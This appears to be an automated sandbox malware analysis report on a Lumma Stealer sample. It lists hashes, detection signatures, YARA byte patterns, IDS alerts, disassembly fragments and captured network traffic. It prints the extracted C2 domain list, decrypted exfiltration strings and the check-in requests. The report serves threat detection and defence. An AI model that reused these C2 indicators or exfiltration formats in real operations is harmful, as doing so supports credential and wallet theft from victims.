Windows Analysis Report
HK8IIasL9i.exe

Overview

General Information

Sample name: HK8IIasL9i.exe (renamed because original name is a hash value)
Original sample name: 7dc18a69dcdca002579bfde5d5427ff2.exe
Analysis ID: 1579755
MD5: 7dc18a69dcdca002579bfde5d5427ff2
SHA1: 3b305cb3e20e48cb0b0532185e49136511838987
SHA256: dbcd285bed7578f894354dd630c4be5cf9ffdf4d4e96b861937235466bc8fc29
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • HK8IIasL9i.exe (PID: 6720 cmdline: "C:\Users\user\Desktop\HK8IIasL9i.exe" MD5: 7DC18A69DCDCA002579BFDE5D5427FF2)
    • WerFault.exe (PID: 4024 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 1728 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["crosshuaht.lat", "sustainskelet.lat", "discokeyus.lat", "energyaffai.lat", "rapeflowwj.lat", "necklacebudi.lat", "aspecteirs.lat", "grannyejh.lat"], "Build id": "4h5VfH--"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
00000000.00000002.2488177075.0000000000470000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
      No Sigma rule has matched
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-12-23T08:38:19.493066+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49704 | 23.55.153.106 | 443 | TCP
      2024-12-23T08:38:22.062968+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49705 | 104.21.66.86 | 443 | TCP
      2024-12-23T08:38:23.761720+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49706 | 104.21.66.86 | 443 | TCP
      2024-12-23T08:38:22.798773+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 104.21.66.86 | 443 | TCP
      2024-12-23T08:38:22.798773+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 104.21.66.86 | 443 | TCP
      2024-12-23T08:38:17.278115+0100 | 2058354 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 55509 | 1.1.1.1 | 53 | UDP
      2024-12-23T08:38:15.793341+0100 | 2058358 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49854 | 1.1.1.1 | 53 | UDP
      2024-12-23T08:38:16.241365+0100 | 2058360 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 59334 | 1.1.1.1 | 53 | UDP
      2024-12-23T08:38:16.889637+0100 | 2058362 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 54190 | 1.1.1.1 | 53 | UDP
      2024-12-23T08:38:16.020160+0100 | 2058364 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 62727 | 1.1.1.1 | 53 | UDP
      2024-12-23T08:38:16.468783+0100 | 2058370 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 54052 | 1.1.1.1 | 53 | UDP
      2024-12-23T08:38:17.728617+0100 | 2058374 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 50156 | 1.1.1.1 | 53 | UDP
      2024-12-23T08:38:17.503964+0100 | 2058376 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 55784 | 1.1.1.1 | 53 | UDP
      2024-12-23T08:38:20.398145+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49704 | 23.55.153.106 | 443 | TCP


      AV Detection

      Source: HK8IIasL9i.exe | Avira: detected
      Source: 0.3.HK8IIasL9i.exe.2150000.0.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["crosshuaht.lat", "sustainskelet.lat", "discokeyus.lat", "energyaffai.lat", "rapeflowwj.lat", "necklacebudi.lat", "aspecteirs.lat", "grannyejh.lat"], "Build id": "4h5VfH--"}
      Source: HK8IIasL9i.exe | ReversingLabs: Detection: 55%
      Source: HK8IIasL9i.exe | Virustotal: Detection: 40%
      Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
      Source: HK8IIasL9i.exe | Joe Sandbox ML: detected
      Source: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: rapeflowwj.lat
      Source: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: crosshuaht.lat
      Source: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: sustainskelet.lat
      Source: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: aspecteirs.lat
      Source: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: energyaffai.lat
      Source: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: necklacebudi.lat
      Source: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: discokeyus.lat
      Source: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: grannyejh.lat
      Source: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: crosshuaht.lat
      Source: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
      Source: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
      Source: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
      Source: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
      Source: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
      Source: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: 4h5VfH--

      Compliance

      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Unpacked PE file: 0.2.HK8IIasL9i.exe.400000.0.unpack
      Source: HK8IIasL9i.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
      Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49704 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49705 version: TLS 1.2
      Source: C:\Users\user\Desktop\HK8IIasL9i.exe | Code function: 4x nop then the following instruction (function address in parentheses):
      • movzx esi, byte ptr [ebp+ebx-10h] (0_2_0043C767)
      • lea edx, dword ptr [ecx+01h] (0_2_0040B70C)
      • jmp eax (0_2_0042984F)
      • movzx edx, byte ptr [esp+eax-0Dh] (0_2_00423860)
      • mov edx, ecx (0_2_00438810)
      • cmp dword ptr [edi+ebp*8], 5E874B5Fh (0_2_00438810)
      • cmp dword ptr [edx+edi*8], BC9C9AFCh (0_2_00438810)
      • test eax, eax (0_2_00438810)
      • mov byte ptr [edi], al (0_2_0041682D)
      • movzx ecx, byte ptr [esp+eax+18h] (0_2_0041682D)
      • movzx ebx, byte ptr [esp+ecx-75h] (0_2_0041682D)
      • mov word ptr [ecx], bp (0_2_0041D83A)
      • push C0BFD6CCh (0_2_00423086)
      • push C0BFD6CCh (0_2_00423086)
      • add ebp, dword ptr [esp+0Ch] (0_2_0042B170)
      • mov eax, dword ptr [esp+00000080h] (0_2_004179C1)
      • cmp dword ptr [esi+edx*8], E5FE86B7h (0_2_0043B1D0)
      • mov ebx, eax (0_2_0043B1D0)
      • mov word ptr [ecx], dx (0_2_004291DD)
      • mov ecx, dword ptr [ebp-20h] (0_2_004291DD)
      • mov ebx, eax (0_2_00405990)
      • mov ebp, eax (0_2_00405990)
      • mov ebx, esi (0_2_00422190)
      • mov word ptr [ebx], cx (0_2_00422190)
      • cmp word ptr [edi+eax+02h], 0000h (0_2_00422190)
      • mov byte ptr [edi], cl (0_2_0042CA49)
      • mov byte ptr [esi], al (0_2_0042DA53)
      • movzx esi, byte ptr [esp+eax-7D4F867Fh] (0_2_00416263)
      • movzx edx, byte ptr [esp+eax+61D008CBh] (0_2_00415220)
      • push esi (0_2_00427AD3)
      • mov byte ptr [edi], cl (0_2_0042CAD0)
      • mov word ptr [ebx], ax (0_2_0041B2E0)
      • push ebx (0_2_0043CA93)
      • mov word ptr [eax], cx (0_2_0041CB40)
      • mov word ptr [esi], cx (0_2_0041CB40)
      • mov word ptr [eax], cx (0_2_00428B61)
      • mov byte ptr [edi], cl (0_2_0042CB11)
      • mov byte ptr [edi], cl (0_2_0042CB22)
      • movzx edx, byte ptr [esp+eax] (0_2_0043F330)
      • mov ebx, eax (0_2_0040DBD9)
      • mov ebx, eax (0_2_0040DBD9)
      • movzx esi, byte ptr [esp+ecx-7D4F867Fh] (0_2_00417380)
      • cmp word ptr [ebx+edi+02h], 0000h (0_2_0041D380)
      • cmp al, 2Eh (0_2_00426B95)
      • movzx ebx, byte ptr [edx] (0_2_00435450)
      • movzx esi, byte ptr [esp+ecx-7D4F867Fh] (0_2_00417380)
      • push 00000000h (0_2_00429C2B)
      • mov word ptr [ecx], dx (0_2_004291DD)
      • mov ecx, dword ptr [ebp-20h] (0_2_004291DD)
      • add eax, dword ptr [esp+ecx*4+24h] (0_2_004074F0)
      • movzx ecx, word ptr [edi+esi*4] (0_2_004074F0)
      • movzx ecx, byte ptr [esp+eax+68E75405h] (0_2_0043ECA0)
      • cmp dword ptr [ebx+edi*8], 9C259492h (0_2_004385E0)
      • jmp eax (0_2_004385E0)
      • movzx edi, byte ptr [esp+ecx-7D4F88C7h] (0_2_00417DEE)
      • mov ecx, eax (0_2_00409580)
      • mov word ptr [ebp+00h], ax (0_2_00409580)
      • jmp dword ptr [0044450Ch] (0_2_00418591)
      • mov eax, dword ptr [ebp-68h] (0_2_00428D93)
      • xor edi, edi (0_2_0041759F)
      • mov eax, dword ptr [0044473Ch] (0_2_0041C653)
      • mov edx, ebp (0_2_00425E70)
      • jmp dword ptr [004455F4h] (0_2_00425E30)
      • mov ecx, eax (0_2_0043AEC0)
      • xor byte ptr [esp+eax+17h], al (0_2_00408F50)
      • mov byte ptr [edi], bl (0_2_00408F50)
      • mov ebx, dword ptr [edi+04h] (0_2_0042A700)
      • mov byte ptr [esi], al (0_2_0041BF14)
      • mov eax, dword ptr [ebx+edi+44h] (0_2_00419F30)
      • movzx ecx, byte ptr [esp+eax+423C9D38h] (0_2_0041E7C0)
      • movzx eax, word ptr [edx] (0_2_004197C2)
      • mov word ptr [edi], dx (0_2_004197C2)
      • mov word ptr [esi], cx (0_2_004197C2)
      • mov ecx, ebx (0_2_0042DFE9)
      • jmp ecx (0_2_0040BFFD)
      • mov esi, eax (0_2_00415799)
      • mov ecx, eax (0_2_00415799)
      • movzx ecx, byte ptr [esp+eax+68E75405h] (0_2_0043EFB0)
      • movzx edi, byte ptr [esp+ecx-7D4F88C7h] (0_2_00748055)
      • movzx edx, byte ptr [esp+eax-0Dh] (0_2_00754031)
      • mov edx, ebp (0_2_007560D7)
      • mov byte ptr [esi], al (0_2_0074C17B)
      • mov ecx, eax (0_2_0076B127)
      • xor byte ptr [esp+eax+17h], al (0_2_007391B7)
      • mov byte ptr [edi], bl (0_2_007391B7)
      • mov eax, dword ptr [ebx+edi+44h] (0_2_0074A197)
      • jmp ecx (0_2_0073C264)
      • mov ecx, ebx (0_2_0075E250)
      • mov word ptr [eax], cx (0_2_0074D230)
      • mov word ptr [esi], cx (0_2_0074D230)
      • movzx ecx, byte ptr [esp+eax+68E75405h] (0_2_0076F217)
      • push C0BFD6CCh (0_2_007532ED)
      • mov ebx, esi (0_2_007523F7)
      • mov word ptr [ebx], cx (0_2_007523F7)
      • cmp word ptr [edi+eax+02h], 0000h (0_2_007523F7)
      • add ebp, dword ptr [esp+0Ch] (0_2_0075B3D7)
      • mov word ptr [ecx], dx (0_2_00759444)
      • mov ecx, dword ptr [ebp-20h] (0_2_00759444)
      • jmp dword ptr [004455F4h] (0_2_007564DA)
      • movzx esi, byte ptr [esp+eax-7D4F867Fh] (0_2_007464CA)
      • movzx edx, byte ptr [esp+eax+61D008CBh] (0_2_00745487)
      • mov word ptr [ebx], ax (0_2_0074B547)
      • movzx esi, byte ptr [esp+ecx-7D4F867Fh] (0_2_007475E7)
      • cmp word ptr [ebx+edi+02h], 0000h (0_2_0074D5E7)
      • movzx edx, byte ptr [esp+eax] (0_2_0076F597)
      • movzx ebx, byte ptr [edx] (0_2_007656B7)
      • add eax, dword ptr [esp+ecx*4+24h] (0_2_00737757)
      • movzx ecx, word ptr [edi+esi*4] (0_2_00737757)
      • mov ecx, eax (0_2_007397E7)
      • mov word ptr [ebp+00h], ax (0_2_007397E7)
      • cmp dword ptr [ebx+edi*8], 9C259492h (0_2_0076887B)
      • mov eax, dword ptr [0044473Ch] (0_2_0074C8BA)
      • lea edx, dword ptr [ecx+01h] (0_2_0073B973)
      • mov ebx, dword ptr [edi+04h] (0_2_0075A967)
      • movzx esi, byte ptr [ebp+ebx-10h] (0_2_0076C9CE)
      • jmp eax (0_2_0076898E)
      • mov edx, ecx (0_2_00768A77)
      • cmp dword ptr [edi+ebp*8], 5E874B5Fh (0_2_00768A77)
      • cmp dword ptr [edx+edi*8], BC9C9AFCh (0_2_00768A77)
      • test eax, eax (0_2_00768A77)
      • movzx ecx, byte ptr [esp+eax+423C9D38h] (0_2_0074EA27)
      • movzx eax, word ptr [edx] (0_2_00749A29)
      • mov word ptr [edi], dx (0_2_00749A29)
      • mov word ptr [esi], cx (0_2_00749A29)
      • movzx esi, byte ptr [esp+ecx+6D2CC012h] (0_2_00744ACD)
      • jmp eax (0_2_00759AB5)
      • mov word ptr [ecx], bp (0_2_0074DAB8)
      • mov byte ptr [edi], al (0_2_00746B2A)
      • mov ebx, eax (0_2_00735BF7)
      • mov ebp, eax (0_2_00735BF7)
      • movzx edx, byte ptr [esp+eax+6D2CC012h] (0_2_00744BD2)
      • mov esi, eax (0_2_00745C41)
      • mov eax, dword ptr [esp+00000080h] (0_2_00747C28)
      • xor edi, edi (0_2_00747C28)
      • push ebx (0_2_0076CCFA)
      • mov byte ptr [edi], cl (0_2_0075CCB0)
      • mov byte ptr [esi], al (0_2_0075DCBC)
      • mov byte ptr [edi], cl (0_2_0075CD78)
      • mov byte ptr [edi], cl (0_2_0075CD37)
      • push esi (0_2_00757D1A)
      • mov word ptr [eax], cx (0_2_00758DC8)
      • mov byte ptr [edi], cl (0_2_0075CD89)
      • mov ebx, eax (0_2_0073DE40)
      • mov ebx, eax (0_2_0073DE40)
      • cmp dword ptr [ebp+edi*8+00h], AF697AECh (0_2_00744E96)
      • cmp al, 2Eh (0_2_00756E96)
      • cmp dword ptr [ebp+edi*8+00h], E785F9BAh (0_2_00744E87)
      • push 00000000h (0_2_00759F40)
      • movzx ecx, byte ptr [esp+eax+18h] (0_2_00746F35)
      • movzx ebx, byte ptr [esp+ecx-75h] (0_2_00746F35)
      • movzx ecx, byte ptr [esp+eax+68E75405h] (0_2_0076EF07)
      • mov ecx, eax (0_2_00745FD3)
      • mov eax, dword ptr [ebp-68h] (0_2_00758FA0)

      Networking

      Source: Network trafficSuricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.5:54052 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.5:50156 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.5:54190 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.5:49854 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.5:59334 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.5:55509 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.5:62727 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.5:55784 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49704 -> 23.55.153.106:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 104.21.66.86:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.66.86:443
      Source: Malware configuration extractorURLs: crosshuaht.lat
      Source: Malware configuration extractorURLs: sustainskelet.lat
      Source: Malware configuration extractorURLs: discokeyus.lat
      Source: Malware configuration extractorURLs: energyaffai.lat
      Source: Malware configuration extractorURLs: rapeflowwj.lat
      Source: Malware configuration extractorURLs: necklacebudi.lat
      Source: Malware configuration extractorURLs: aspecteirs.lat
      Source: Malware configuration extractorURLs: grannyejh.lat
      Source: Joe Sandbox ViewIP Address: 104.21.66.86 104.21.66.86
      Source: Joe Sandbox View | IP Address: 23.55.153.106 23.55.153.106
      Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.66.86:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.66.86:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 23.55.153.106:443
      Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
      Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (10 occurrences)
      Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
      Source: HK8IIasL9i.exe, 00000000.00000003.2129470803.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: .fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https:0M equals www.youtube.com (Youtube)
      Source: HK8IIasL9i.exe, 00000000.00000003.2107370383.000000000067D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: jContent-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=355ae53a3900853509b7ceaa; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Conte equals www.youtube.com (Youtube)
      Source: HK8IIasL9i.exe, 00000000.00000003.2107370383.000000000067D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: jContent-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=355ae53a3900853509b7ceaa; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 23 Dec 2024 07:38:20 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
      Source: global traffic | DNS traffic detected: DNS query: crosshuaht.lat
